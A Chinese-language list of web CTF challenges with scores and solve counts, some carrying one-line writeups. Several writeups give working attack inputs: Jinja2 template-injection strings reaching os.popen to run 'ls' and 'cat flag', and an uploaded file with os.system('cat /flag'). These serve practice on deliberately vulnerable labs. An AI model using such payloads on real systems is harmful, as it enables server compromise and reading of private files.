70. [平台] GET

分数: 10 金币: 1 已通过

通过: 28045 标签: 平台 WEB

writeup: /?what=flag

69. [平台] 计算器

分数: 10 金币: 1 已通过

通过: 28941 标签: 平台 WEB

writeup: 修改input maxlength

68. [平台] 滑稽

分数: 10 金币: 1 已通过

通过: 29131 标签: 平台 WEB

writeup: 查看源码，搜索flag

374. [平台] 留言板

分数: 10 金币: 3 已通过

通过: 2392 标签: 平台 WEB

writeup: 使用公用xss或自建xss平台，提交payload，接收到flag

204. [平台] Flask_FileUpload

分数: 10 金币: 3 已通过

通过: 11128 标签: 平台 WEB

writeup: 上传demo.jpg，内容为 import os\r\nos.system('cat /flag')，f12查看内容

203. [平台] Simple_SSTI_2

分数: 10 金币: 3 已通过

通过: 14983 标签: 平台 WEB

writeup: SSTI模版注入: /?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}, 再 /?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

196. [平台] Simple_SSTI_1

分数: 5 金币: 2 已通过

通过: 27864 标签: 平台 WEB

writeup: /?flag={{config}}

2388. [真题] Secret Group

分数: 0 金币: 0

通过: 45 标签: n00bzCTF-2023 WEB

2387. [真题] Robots

分数: 0 金币: 0

通过: 67 标签: n00bzCTF-2023 WEB

writeup: 查看

2386. [真题] Conditions

分数: 0 金币: 0

通过: 12 标签: n00bzCTF-2023 WEB

2385. [真题] CaaS2

分数: 0 金币: 0

通过: 2 标签: n00bzCTF-2023 WEB

2384. [真题] CaaS

分数: 0 金币: 0

通过: 4 标签: n00bzCTF-2023 WEB

2364. [真题] mark that down

分数: 0 金币: 0

通过: 1 标签: n00bzCTF-2022 WEB

2363. [真题] RIaaS

分数: 0 金币: 0

通过: 2 标签: n00bzCTF-2022 WEB

2362. [真题] Curl as a Service

分数: 0 金币: 0

通过: 25 标签: n00bzCTF-2022 WEB

2323. [真题] Resume

分数: 0 金币: 0

通过: 1 标签: Welcome CTF-2021 WEB

2322. [真题] tiny_file_hosting

分数: 0 金币: 0

通过: 2 标签: Welcome CTF-2021 WEB

2321. [真题] no_submit_security

分数: 0 金币: 0

通过: 28 标签: Welcome CTF-2021 WEB

2320. [真题] Ketchup

分数: 0 金币: 0

通过: 40 标签: Welcome CTF-2021 WEB

2316. [真题] Sort It Out

分数: 0 金币: 0

通过: 0 标签: greyctf-2023-quals WEB